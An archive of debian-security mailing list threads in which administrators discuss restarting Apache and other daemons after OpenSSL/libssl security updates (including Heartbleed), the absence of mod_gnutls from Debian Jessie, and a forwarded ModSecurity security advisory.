RE: Apache doesn't restart after new libssl is installed - it does on Debian 11.5

2023-02-08 Thread William Salmon
Hi 
Our apache restarts fine. I'm on Debian 11.5 with unattended-upgrades for 
bullseye-security ONLY

We have:

 libssl1.1  Version: 1.1.1n-0+deb11u4) - updated 8 Feb 2023 
and 
 apache2 Version: 2.4.54-1~deb11u1

So is this a Debian 11.6 problem ??
Cheers
Will

Will Salmon, 
Systems & Infrastructure Support Officer (Linux web servers), 
- FMS Technology Enhanced Learning team (ex LTSU),
- Newcastle University, Medical Sciences Graduate School office
- Ridley Building 1, floor 3
E-mail: will.sal...@ncl.ac.uk

-Original Message-
From: Phil Endecott  
Sent: 08 February 2023 14:02
To: debian-security@lists.debian.org
Subject: Apache doesn't restart after new libssl is installed

⚠ External sender. Take care when opening links or attachments. Do not provide 
your login details.

Dear Experts,

I have a Debian 11 system running Apache and unattended-upgrades.

I received the DSA 5343-1 email advertising the new openssl
package, 1.1.1n-0+deb11u4. Unattended-upgrades had installed this
before I even read the email - great.

But Apache has not been restarted, and it seems to be running
with the old libssl still:

# grep ssl /proc/661/maps
7fcb5bd97000-7fcb5bdb4000 r--p  ca:02 265814
/usr/lib/x86_64-linux-gnu/libssl.so.1.1 (deleted)

Obviously the security issues are not closed until Apache (and
any other daemon linked with openssl) restart, and that may not
happen for a long time! This is not the first time I have seen
something like this happen.

Whose responsibility is this? Should the Apache package somehow
know that it needs to restart itself? Should the libssl package
do something to cause Apache to restart? Should the unattended-
upgrades package know to restart Apache when libssl has been
upgraded?

I know there is a mechanism of some kind to cause daemons to
restart when libraries they use are being replaced; is that just
for libc updates, or something?


Thanks,

Phil.


P.S. If you Cc: me in your reply, I'll see it sooner.






RE: Apache doesn't restart after new libssl is installed

2023-02-08 Thread William Salmon
Sorry, I should have said that on our app. VMs Apache mod_ssl is NOT enabled as 
we use a proxy to add the SSL layer
Cheers
Will Salmon, 
Systems & Infrastructure Support Officer (Linux web servers), 
- FMS Technology Enhanced Learning team (ex LTSU),
- Newcastle University,
-Original Message-
From: William Salmon 
Sent: 08 February 2023 16:06
To: Phil Endecott ; 
debian-security@lists.debian.org
Subject: RE: Apache doesn't restart after new libssl is installed - it does on 
Debian 11.5

Hi 
Our apache restarts fine. I'm on Debian 11.5 with unattended-upgrades for 
bullseye-security ONLY

We have:

 libssl1.1  Version: 1.1.1n-0+deb11u4) - updated 8 Feb 2023 
and 
 apache2 Version: 2.4.54-1~deb11u1

So is this a Debian 11.6 problem ??
Cheers
Will

Will Salmon, 
Systems & Infrastructure Support Officer (Linux web servers), 
- FMS Technology Enhanced Learning team (ex LTSU),
- Newcastle University, 

-Original Message-
From: Phil Endecott  
Sent: 08 February 2023 14:02
To: debian-security@lists.debian.org
Subject: Apache doesn't restart after new libssl is installed

⚠ External sender. Take care when opening links or attachments. Do not provide 
your login details.

Dear Experts,

I have a Debian 11 system running Apache and unattended-upgrades.

I received the DSA 5343-1 email advertising the new openssl
package, 1.1.1n-0+deb11u4. Unattended-upgrades had installed this
before I even read the email - great.

But Apache has not been restarted, and it seems to be running
with the old libssl still:

# grep ssl /proc/661/maps
7fcb5bd97000-7fcb5bdb4000 r--p  ca:02 265814
/usr/lib/x86_64-linux-gnu/libssl.so.1.1 (deleted)

Obviously the security issues are not closed until Apache (and
any other daemon linked with openssl) restart, and that may not
happen for a long time! This is not the first time I have seen
something like this happen.

Whose responsibility is this? Should the Apache package somehow
know that it needs to restart itself? Should the libssl package
do something to cause Apache to restart? Should the unattended-
upgrades package know to restart Apache when libssl has been
upgraded?

I know there is a mechanism of some kind to cause daemons to
restart when libraries they use are being replaced; is that just
for libc updates, or something?


Thanks,

Phil.


P.S. If you Cc: me in your reply, I'll see it sooner.






Re: Apache doesn't restart after new libssl is installed

2023-02-08 Thread Phil Endecott

Henrik Ahlgren wrote:

On Wed, 2023-02-08 at 14:01 +, Phil Endecott wrote:

Whose responsibility is this? Should the Apache package somehow
know that it needs to restart itself? Should the libssl package
do something to cause Apache to restart? Should the unattended-
upgrades package know to restart Apache when libssl has been
upgraded?

I know there is a mechanism of some kind to cause daemons to
restart when libraries they use are being replaced; is that just
for libc updates, or something?


Have a look into the needrestart package, which is suggested, but not
required, by unattended-upgrades.


Thanks for the suggestion - yes, this does seem to be what I need.

I may file a bug suggesting that this is installed (and enabled)
by default, in particular for the Debian cloud images which have
had unattended-upgrades installed for longer than other systems.
Fundamentally I think that unattended-upgrades without restarting
daemons is just giving a false sense of security. Thoughts anyone?


Regards, Phil.






Re: [External Email] Re: Apache doesn't restart after new libssl is installed

2023-02-08 Thread Craig
Would that not be the responsibility of the systemd bit for Apache (if 
using systemd)?

That said, I am not sure systemd does a great job of restarting a service.
Might require tailoring on the particular server.


https://ma.ttias.be/auto-restart-crashed-service-systemd/

On Wed, 2023-02-08 at 14:01 +, Phil Endecott wrote:

Whose responsibility is this? Should the Apache package somehow
know that it needs to restart itself? Should the libssl package
do something to cause Apache to restart? Should the unattended-
upgrades package know to restart Apache when libssl has been
upgraded?

I know there is a mechanism of some kind to cause daemons to
restart when libraries they use are being replaced; is that just
for libc updates, or something?

Have a look into the needrestart package, which is suggested, but not
required, by unattended-upgrades.




--
@ITS
Craig M. Houck ><>
Binghamton University - ITS:Systems

Re: Apache doesn't restart after new libssl is installed

2023-02-08 Thread Henrik Ahlgren
On Wed, 2023-02-08 at 14:01 +, Phil Endecott wrote:
> Whose responsibility is this? Should the Apache package somehow
> know that it needs to restart itself? Should the libssl package
> do something to cause Apache to restart? Should the unattended-
> upgrades package know to restart Apache when libssl has been
> upgraded?
> 
> I know there is a mechanism of some kind to cause daemons to
> restart when libraries they use are being replaced; is that just
> for libc updates, or something?

Have a look into the needrestart package, which is suggested, but not
required, by unattended-upgrades.




Apache doesn't restart after new libssl is installed

2023-02-08 Thread Phil Endecott

Dear Experts,

I have a Debian 11 system running Apache and unattended-upgrades.

I received the DSA 5343-1 email advertising the new openssl
package, 1.1.1n-0+deb11u4. Unattended-upgrades had installed this
before I even read the email - great.

But Apache has not been restarted, and it seems to be running
with the old libssl still:

# grep ssl /proc/661/maps
7fcb5bd97000-7fcb5bdb4000 r--p  ca:02 265814 
/usr/lib/x86_64-linux-gnu/libssl.so.1.1 (deleted)


Obviously the security issues are not closed until Apache (and
any other daemon linked with openssl) restart, and that may not
happen for a long time! This is not the first time I have seen
something like this happen.

Whose responsibility is this? Should the Apache package somehow
know that it needs to restart itself? Should the libssl package
do something to cause Apache to restart? Should the unattended-
upgrades package know to restart Apache when libssl has been
upgraded?

I know there is a mechanism of some kind to cause daemons to
restart when libraries they use are being replaced; is that just
for libc updates, or something?


Thanks,

Phil.


P.S. If you Cc: me in your reply, I'll see it sooner.






Re: Apache SSL in Jessie

2015-06-11 Thread Jonathan Wiltshire

On 2015-06-11 15:42, Nikolai Lusan wrote:

On Thu, 2015-06-11 at 14:54 +0100, Jonathan Wiltshire wrote:



See https://tracker.debian.org/pkg/mod-gnutls

I removed it from Jessie in November 2014 with the following comments:

#20141031
Bug #750857: FTBFS on many architectures, test suite errors
# blocks gnutls28/libgcrypt20 transition

Since then it didn't build on all supported architectures, so it has 
not

migrated (even now) and therefore wasn't in Jessie.


Does this mean I'm going to have to wait for a backport?


Yes; it won't enter Jessie now.

You could offer to help the maintainers get the package into shape and 
backported...


--
Jonathan Wiltshire  j...@debian.org
Debian Developer http://people.debian.org/~jmw

4096R: 0xD3524C51 / 0A55 B7C5 1223 3942 86EC  74C3 5394 479D D352 4C51

 i have six years of solaris sysadmin experience, from
8->10. i am well qualified to say it is made from bonghits
layered on top of bonghits


--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/3c48eb719ee336f98b767109cab7a...@hogwarts.powdarrmonkey.net



Re: Apache SSL in Jessie

2015-06-11 Thread Nikolai Lusan
On Thu, 2015-06-11 at 14:54 +0100, Jonathan Wiltshire wrote:

> 
> See https://tracker.debian.org/pkg/mod-gnutls
> 
> I removed it from Jessie in November 2014 with the following comments:
> 
> #20141031
> Bug #750857: FTBFS on many architectures, test suite errors
> # blocks gnutls28/libgcrypt20 transition
> 
> Since then it didn't build on all supported architectures, so it has not 
> migrated (even now) and therefore wasn't in Jessie.

Does this mean I'm going to have to wait for a backport?

-- 
Nikolai Lusan 


signature.asc
Description: This is a digitally signed message part


Re: Apache SSL in Jessie

2015-06-11 Thread Jonathan Wiltshire

On 2015-06-11 14:38, Nikolai Lusan wrote:

On Thu, 2015-06-11 at 13:00 +, Lee Packham wrote:

The module is available by default... it is no longer separated.


Which is mod_ssl, not mod_gnutls - the configuration directives are
completely different, as are the linked libs.

I think it's a little odd that a package (libapache2-mod-gnutls) that
was in all previous releases, and is still in unstable, is not 
available

in stable.


See https://tracker.debian.org/pkg/mod-gnutls

I removed it from Jessie in November 2014 with the following comments:

#20141031
Bug #750857: FTBFS on many architectures, test suite errors
# blocks gnutls28/libgcrypt20 transition

Since then it didn't build on all supported architectures, so it has not 
migrated (even now) and therefore wasn't in Jessie.



--
Jonathan Wiltshire  j...@debian.org
Debian Developer http://people.debian.org/~jmw

4096R: 0xD3524C51 / 0A55 B7C5 1223 3942 86EC  74C3 5394 479D D352 4C51

 i have six years of solaris sysadmin experience, from
8->10. i am well qualified to say it is made from bonghits
layered on top of bonghits


--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/8ad755f167c22ef89983104366851...@hogwarts.powdarrmonkey.net



Re: Apache SSL in Jessie

2015-06-11 Thread Estelmann, Christian
Hm
https://bugs.debian.org/750857#55
Re-entered it Jessie after the bug was closed? Or ist it missing in Jessie 
since 31 Oct 2014?


Am 11. Juni 2015 15:38:54 MESZ, schrieb Nikolai Lusan :
>On Thu, 2015-06-11 at 13:00 +, Lee Packham wrote: 
>> The module is available by default... it is no longer separated.
>
>Which is mod_ssl, not mod_gnutls - the configuration directives are
>completely different, as are the linked libs.
>
>I think it's a little odd that a package (libapache2-mod-gnutls) that
>was in all previous releases, and is still in unstable, is not
>available
>in stable.
>
>-- 
>Nikolai Lusan 


Re: Apache SSL in Jessie

2015-06-11 Thread Nikolai Lusan
On Thu, 2015-06-11 at 13:00 +, Lee Packham wrote: 
> The module is available by default... it is no longer separated.

Which is mod_ssl, not mod_gnutls - the configuration directives are
completely different, as are the linked libs.

I think it's a little odd that a package (libapache2-mod-gnutls) that
was in all previous releases, and is still in unstable, is not available
in stable.

-- 
Nikolai Lusan 


signature.asc
Description: This is a digitally signed message part


Re: Apache SSL in Jessie

2015-06-11 Thread Lee Packham
Just to nail that home (I just checked one of my hosts):

# dpkg-query -S /usr/lib/apache2/modules/mod_ssl.so
apache2-bin: /usr/lib/apache2/modules/mod_ssl.so

On Thu, 11 Jun 2015 at 14:00 Lee Packham  wrote:

> The module is available by default... it is no longer separated.
>
>
> On Thu, 11 Jun 2015 at 13:55 Nikolai Lusan  wrote:
>
>> Hi,
>>
>> I just updated a work machine from Wheezy to Jessie. I was alarmed to
>> find that Apache was no longer running. The cause of this being a
>> problem loading mod_gnutls. After a bunch of digging about it turns out
>> that (according to packages.debian.org) there is no
>> libapache2-mod-gnutls available for Jessie. It is however available in
>> Squeeze, Squeeze-lts, Wheezy, and Sid. There is also no mod_ssl package
>> in Jessie.
>>
>> In short how am I supposed to get any SSL/TLS into apache on Jessie
>> installs?
>>
>> --
>> Nikolai Lusan 
>>
>


Re: Apache SSL in Jessie

2015-06-11 Thread Lee Packham
The module is available by default... it is no longer separated.


On Thu, 11 Jun 2015 at 13:55 Nikolai Lusan  wrote:

> Hi,
>
> I just updated a work machine from Wheezy to Jessie. I was alarmed to
> find that Apache was no longer running. The cause of this being a
> problem loading mod_gnutls. After a bunch of digging about it turns out
> that (according to packages.debian.org) there is no
> libapache2-mod-gnutls available for Jessie. It is however available in
> Squeeze, Squeeze-lts, Wheezy, and Sid. There is also no mod_ssl package
> in Jessie.
>
> In short how am I supposed to get any SSL/TLS into apache on Jessie
> installs?
>
> --
> Nikolai Lusan 
>


Apache SSL in Jessie

2015-06-11 Thread Nikolai Lusan
Hi,

I just updated a work machine from Wheezy to Jessie. I was alarmed to
find that Apache was no longer running. The cause of this being a
problem loading mod_gnutls. After a bunch of digging about it turns out
that (according to packages.debian.org) there is no
libapache2-mod-gnutls available for Jessie. It is however available in
Squeeze, Squeeze-lts, Wheezy, and Sid. There is also no mod_ssl package
in Jessie. 

In short how am I supposed to get any SSL/TLS into apache on Jessie
installs?

-- 
Nikolai Lusan 


signature.asc
Description: This is a digitally signed message part


RE: [SECURITY] [DSA 2991-1] modsecurity-apache security update

2014-07-28 Thread Mike Gronbach
Ryan,

Can you tell me if we use the below module?

Thanks,

Mike Gronbach
Tech Support
402-332-2265

This communication, along with any attachments, is covered by federal and state 
law governing electronic communications and may contain confidential and 
legally privileged information.  If the reader of this message is not the 
intended recipient, you are hereby notified that any dissemination, 
distribution, use or copying of this message is strictly prohibited.  If you 
have received this in error, please reply immediately to the sender and delete 
this message.  Thank you.

-Original Message-
From: Salvatore Bonaccorso [mailto:car...@master.debian.org] On Behalf Of 
Salvatore Bonaccorso
Sent: Sunday, July 27, 2014 12:54 PM
To: debian-security-annou...@lists.debian.org
Subject: [SECURITY] [DSA 2991-1] modsecurity-apache security update
Importance: High

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2991-1   secur...@debian.org
http://www.debian.org/security/  Salvatore Bonaccorso
July 27, 2014  http://www.debian.org/security/faq
- -

Package: modsecurity-apache
CVE ID : CVE-2013-5705

Martin Holst Swende discovered a flaw in the way chunked requests are handled 
in ModSecurity, an Apache module whose purpose is to tighten the Web 
application security. A remote attacker could use this flaw to bypass intended 
mod_security restrictions by using chunked transfer coding with a capitalized 
Chunked value in the Transfer-Encoding HTTP header, allowing to send requests 
containing content that should have been removed by mod_security.

For the stable distribution (wheezy), this problem has been fixed in version 
2.6.6-6+deb7u2.

For the testing distribution (jessie), this problem has been fixed in version 
2.7.7-1.

For the unstable distribution (sid), this problem has been fixed in version 
2.7.7-1.

We recommend that you upgrade your modsecurity-apache packages.

Further information about Debian Security Advisories, how to apply these 
updates to your system and frequently asked questions can be found at: 
http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCgAGBQJT1TyJAAoJEAVMuPMTQ89EPbcP/3Wp/A51dg7AEfLFAyJfm8lG
5/8GAIU/UuFtZfigv9yRi1d7ZkFWbihSKlAxFju2yzHP7dlFG8jawLDYT3kB0HP4
DPxDbsCXr/hxnE13sSdKOUnb2Geonpkxj9XOMoWlRy73fcBvURd/8hee1ecznP5M
5ShIh1ycKtbobFPszuohmeX02Hihgyhv1pcDM33kJhn+khHLwA8Qp3LZPdRqkxZr
jn1mczla0U1mAB+ABh2/aHtIRWj5NEfaNNu5KBPzFSbYVtmtp/HfR3wh6Y/CQiNw
TcYv4vXDrr0EKLQbTfdlbsnS1z1ljSUnzZXzL9dqMuJul19wyqitVQHfyKcW09Qd
eXDnPO1ugTpc6OVXKwDsHYge5z5G/0oJrb+TAhwkm7OAWtRpQ9ACIq1l/Zd4y3L+
fbcrBQ70sJXnv3G9kmH/EqpRs6EfwCkoS5TQxJdqF5uagXC6t+DVrPID3/deVyoJ
Rdb39EnwdLjOJQG3D2I9RBAVNyc+V92A+8LjBLBe6py0GpHaF/xza1gOtNOeDXaU
sVIWovygVXS1bkTtoaTt5I8K38b3scm1CY+SrEDVbpEgmSSn/SAo+6EmSEzwuBFe
dhVciIc5M1e8iUmsI3b/CKyB9BnFenEcgfUAXUT8N/hGZtNgwoMDZkGjaAMI5ZtV
m9gyPKh1q8m5/qhuiXm4
=PvWw
-END PGP SIGNATURE-


--
To UNSUBSCRIBE, email to debian-security-announce-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/e1xbsdm-00016h...@master.debian.org



--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/ffc6b323fb24b348b08290431be663d10a5abc7...@pbcms1.pinnaclebancorp.com



Re: DSA 2896-2 openssl - Apache 2 not detected as service to restart by postinst?

2014-04-09 Thread Bernhard R. Link
* Jeremie Marguerie  [140409 15:28]:
> Yes the private keys can be compromised, but the perfect secrecy
> should ensure that unless someone was doing an active MITM and had the
> private key, the communications were safe.

As the communication was part of the data transported with the ssl
library those communication might have also been read via the
vulnerability in question.

The only think PFS gives you is that someone recording the encrypted
traffic (i.e. being able to control some router between you and that
host) and getting the private key (e.g. via this vulnerability) would
not be able to decrypt this data (unless of course there is weak randomness
on one of the two sides, in which case PFS as implemented in SSL
does not even need you to get the private key).

While the vulnerability means that anyone could have read data running
over this server by just being able to open a tcp connection there,
without any wiretapping, man in the middle or anything else special.

Bernhard R. Link
-- 
F8AC 04D5 0B9B 064B 3383  C3DA AFFC 96D1 151D FFDC


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/20140409213424.ga15...@client.brlink.eu



Re: DSA 2896-2 openssl - Apache 2 not detected as service to restart by postinst?

2014-04-09 Thread Jeremie Marguerie
Yes the private keys can be compromised, but the perfect secrecy
should ensure that unless someone was doing an active MITM and had the
private key, the communications were safe.

On Wed, Apr 9, 2014 at 3:06 PM, Artikel-140  wrote:
> Hi,
>
> If Perfect Forward Secrecy is enabled, it there still a change that the
> private keys are compromised? This is the hole point about PFS, right?
>
> Grtz,
>
>
> On 04/09/2014 02:15 PM, bsod wrote:
>> Am 2014-04-09 13:38, schrieb Vladislav Kurz:
>>> So, why does openssh-server depend on libssl ?
>> oh... my bad, searched for dependencies openssl instead of libssl.
>>
>> However, it still does not use TLS and is therefore not concerned by
>> bugs in the heartbeat extension to it.
>>
>> Kind regards,
>>
>> Chris
>>
>>
>
>
> --
>
>
> --
> To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
> Archive: https://lists.debian.org/20140409131404.dd331...@bendel.debian.org
>



-- 
Jérémie MARGUERIE


--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/CAKS89Gr-f8RTZ7aFpsQ4cxhf1ung0p860WWb=rkucytvryg...@mail.gmail.com



Re: DSA 2896-2 openssl - Apache 2 not detected as service to restart by postinst?

2014-04-09 Thread Artikel-140
Hi,

If Perfect Forward Secrecy is enabled, it there still a change that the
private keys are compromised? This is the hole point about PFS, right?

Grtz,


On 04/09/2014 02:15 PM, bsod wrote:
> Am 2014-04-09 13:38, schrieb Vladislav Kurz:
>> So, why does openssh-server depend on libssl ?
> oh... my bad, searched for dependencies openssl instead of libssl.
> 
> However, it still does not use TLS and is therefore not concerned by
> bugs in the heartbeat extension to it.
> 
> Kind regards,
> 
> Chris
> 
> 


-- 


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/20140409131404.dd331...@bendel.debian.org



Re: DSA 2896-2 openssl - Apache 2 not detected as service to restart by postinst?

2014-04-09 Thread bsod

Am 2014-04-09 13:38, schrieb Vladislav Kurz:

So, why does openssh-server depend on libssl ?

oh... my bad, searched for dependencies openssl instead of libssl.

However, it still does not use TLS and is therefore not concerned by 
bugs in the heartbeat extension to it.


Kind regards,

Chris


--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/ea95cf44bdaeef0eb91400df424f0...@zom.bi



Re: DSA 2896-2 openssl - Apache 2 not detected as service to restart by postinst?

2014-04-09 Thread Rob van der Putten

Hi there


Vladislav Kurz wrote:


So, why does openssh-server depend on libssl ?

ldd /usr/sbin/sshd says it needs libcrypto.so, which is part of openssl?


Maybe the question should be does SSH use a heartbeat?


Regards,
Rob


--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/li3d95$rim$1...@ger.gmane.org



Re: DSA 2896-2 openssl - Apache 2 not detected as service to restart by postinst?

2014-04-09 Thread Apollon Oikonomopoulos
On 13:26 Wed 09 Apr , bsod wrote:
> Am 2014-04-09 12:42, schrieb Rob van der Putten:
> >According to a post on slashdot SSH is not effected. I don't know if
> >this is correct.
> 
> (Open-)SSH is not affected as it does not use openssl at all. Should be the
> same for other SSH daemons like dropbear as they are not using TLS in SSH
> Protocol.

Actually OpenSSH uses OpenSSL, it just does not use TLS for transport.  
OpenSSL comprises two libraries: libcrypto[1] and libssl, providing 
generic crypto facilities and transport security respectively. The 
affected functions (dtls1_process_heartbeat() and 
tls1_process_heartbeat()) reside in libssl. Software linking only 
against libcrypto.so.1.0.0[2] (which includes openssh, bind9, slapd - 
which uses GnuTLS for transport security by the way) should not be 
vulnerable, despite depending on libssl1.0.0.

[1] http://wiki.openssl.org/index.php/Libcrypto_API
[2] From [1]: "You can however use libcrypto without using libssl."

Regards,
Apollon


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/20140409114405.gb8...@marvin.ws.skroutz.gr



Re: DSA 2896-2 openssl - Apache 2 not detected as service to restart by postinst?

2014-04-09 Thread Vladislav Kurz
On Wednesday 09 of April 2014 13:26:06 bsod wrote:
> Am 2014-04-09 12:42, schrieb Rob van der Putten:
> > According to a post on slashdot SSH is not effected. I don't know if
> > this is correct.
> 
> (Open-)SSH is not affected as it does not use openssl at all. Should be
> the same for other SSH daemons like dropbear as they are not using TLS
> in SSH Protocol.

So, why does openssh-server depend on libssl ?

ldd /usr/sbin/sshd says it needs libcrypto.so, which is part of openssl?


-- 
S pozdravem
Vladislav Kurz

=== WebStep, s.r.o. (Ltd.) = a step to the Web ===
address: Mezirka 1, 602 00 Brno, CZ, tel: +420 548 214 711
Obchodní podmínky: http://zkrat.to/op
=== www.webstep.net === vladislav.k...@webstep.net ===



Re: DSA 2896-2 openssl - Apache 2 not detected as service to restart by postinst?

2014-04-09 Thread bsod

Am 2014-04-09 12:42, schrieb Rob van der Putten:

According to a post on slashdot SSH is not effected. I don't know if
this is correct.


(Open-)SSH is not affected as it does not use openssl at all. Should be 
the same for other SSH daemons like dropbear as they are not using TLS 
in SSH Protocol.


Kind Regards,

Chris


--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/cd338aaf511bed43638be1ac3f6a9...@zom.bi



Re: DSA 2896-2 openssl - Apache 2 not detected as service to restart by postinst?

2014-04-09 Thread Lupe Christoph
On Wednesday, 2014-04-09 at 12:42:16 +0200, Rob van der Putten wrote:

> AFAIK all services that use TLS + open-ssl are effected.
> I generated new keys for Apache, Asterisk, Exim and imap and
> restarted those services.
> According to a post on slashdot SSH is not effected. I don't know if
> this is correct.

It would probably be a good idea not to rely on a fixed list of services
which would exclude programs the user installed from other sources, but
use something like this:

grep libssl.so /proc/*/maps
(Assuming that libcrypto.so did not change in this update.)

I admit that mapping the list of processes to services is hard, so the
best way would probably be to filter the list by known executables and
list the unknowns for the user to restart by hand.

Lupe Christoph
-- 
| The politician's syllogism:|
| We must do something   |
| This is something  |
| Therefore, we must do this.|


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/20140409112033.ga7...@lupe-christoph.de



Re: DSA 2896-2 openssl - Apache 2 not detected as service to restart by postinst?

2014-04-09 Thread Stephan Seitz

On Wed, Apr 09, 2014 at 10:51:42AM +0300, Henrik Ahlgren wrote:

If new services will be added to the restart check list, I think both
puppet and puppetmaster should be included, too.


The service snmpd should be restarted as well. At least checkrestart says 
so.


Shade and sweet water!

Stephan

--
| Stephan Seitz  E-Mail: s...@fsing.rootsland.net |
| Public Keys: http://fsing.rootsland.net/~stse/keys.html |


smime.p7s
Description: S/MIME cryptographic signature


Re: DSA 2896-2 openssl - Apache 2 not detected as service to restart by postinst?

2014-04-09 Thread Rob van der Putten

Hi there


Salvatore Bonaccorso wrote:


Yes this is unfortunately a bug in that part of the libssl1.0.0
postinst! apache2 is also affected and should be restarted after the
openssl update.


AFAIK all services that use TLS + open-ssl are effected.
I generated new keys for Apache, Asterisk, Exim and imap and restarted 
those services.
According to a post on slashdot SSH is not effected. I don't know if 
this is correct.



Regards,
Rob


--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/li3868$q27$1...@ger.gmane.org



Re: DSA 2896-2 openssl - Apache 2 not detected as service to restart by postinst?

2014-04-09 Thread Stefan Eriksson
I've seen pound has this issue, sites which use pound as proxy need to 
restart pound manually, before that is done it doesnt use the newly 
installed openssl.


2014-04-09 09:51, Henrik Ahlgren skrev:

On Tue, Apr 08, 2014 at 08:24:52PM +0200, Salvatore Bonaccorso wrote:

Yes this is unfortunately a bug in that part of the libssl1.0.0
postinst! apache2 is also affected and should be restarted after the
openssl update.


If new services will be added to the restart check list, I think both
puppet and puppetmaster should be included, too.






--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/534502f1.4090...@glesys.se



Re: DSA 2896-2 openssl - Apache 2 not detected as service to restart by postinst?

2014-04-09 Thread Henrik Ahlgren
On Tue, Apr 08, 2014 at 08:24:52PM +0200, Salvatore Bonaccorso wrote:
> Yes this is unfortunately a bug in that part of the libssl1.0.0
> postinst! apache2 is also affected and should be restarted after the
> openssl update.

If new services will be added to the restart check list, I think both
puppet and puppetmaster should be included, too.



-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/20140409075141.ga30...@seestieto.com



Re: DSA 2896-2 openssl - Apache 2 not detected as service to restart by postinst?

2014-04-08 Thread Salvatore Bonaccorso
Hi Frederik,

On Tue, Apr 08, 2014 at 04:01:37PM +, Fredrik Jonson wrote:
> Hi,
> 
> After upgrading the packages in DSA 2896-2 (openssl security update),
> the second version, 1.0.1e-2+deb7u6, that detects services to restart, I
> noted that the postist script didn't suggest that I should restart
> apache2.
> 
> As far as I can tell apache2 (apache2.2-bin) depends on libssl1.0.0 and
> could be affected by CVE-2014-0160. Correct?
> 
> I note that the postinst script in libssl1.0.0 searches for the virtual
> package apache2-common which is not installed on my servers.
> 
> Is this a bug in the postinst script, or is apache2 not affected, or is
> it a user error to not have the virtual package installed?
> 
> BTW, thanks to all involved in Debian's rapid response to this CVE!

Yes this is unfortunately a bug in that part of the libssl1.0.0
postinst! apache2 is also affected and should be restarted after the
openssl update.

Salvatore


signature.asc
Description: Digital signature


AW: DSA 2896-2 openssl - Apache 2 not detected as service to restart by postinst?

2014-04-08 Thread Felix Berlakovich
Hi,

I can confirm this behaviour. In addition I am quite sure that apache2 is 
affected because I have tested it with the heartbleed check 
(http://heartbleed.com) directly after the security update and it was still 
vulnerable. After I restarted apache2 manually the vulnerability was gone. 

Regards,

Felix

> -Ursprüngliche Nachricht-
> Von: Fredrik Jonson [mailto:fred...@jonson.org]
> Gesendet: Dienstag, 08. April 2014 18:02
> An: debian-security@lists.debian.org
> Betreff: DSA 2896-2 openssl - Apache 2 not detected as service to restart by
> postinst?
> 
> Hi,
> 
> After upgrading the packages in DSA 2896-2 (openssl security update), the
> second version, 1.0.1e-2+deb7u6, that detects services to restart, I noted
> that the postist script didn't suggest that I should restart apache2.
> 
> As far as I can tell apache2 (apache2.2-bin) depends on libssl1.0.0 and could
> be affected by CVE-2014-0160. Correct?
> 
> I note that the postinst script in libssl1.0.0 searches for the virtual 
> package
> apache2-common which is not installed on my servers.
> 
> Is this a bug in the postinst script, or is apache2 not affected, or is it a 
> user
> error to not have the virtual package installed?
> 
> BTW, thanks to all involved in Debian's rapid response to this CVE!
> --
> Fredrik Jonson
> 
> 
> --
> To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
> Archive: https://lists.debian.org/slrnlk87b1.frm.fred...@biggles.jonson.org


--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/710beceab6885242a9bcedd7a33f66483a15d...@vxc1.berlakovich.net



DSA 2896-2 openssl - Apache 2 not detected as service to restart by postinst?

2014-04-08 Thread Fredrik Jonson
Hi,

After upgrading the packages in DSA 2896-2 (openssl security update),
the second version, 1.0.1e-2+deb7u6, that detects services to restart, I
noted that the postist script didn't suggest that I should restart
apache2.

As far as I can tell apache2 (apache2.2-bin) depends on libssl1.0.0 and
could be affected by CVE-2014-0160. Correct?

I note that the postinst script in libssl1.0.0 searches for the virtual
package apache2-common which is not installed on my servers.

Is this a bug in the postinst script, or is apache2 not affected, or is
it a user error to not have the virtual package installed?

BTW, thanks to all involved in Debian's rapid response to this CVE!
-- 
Fredrik Jonson


-- 
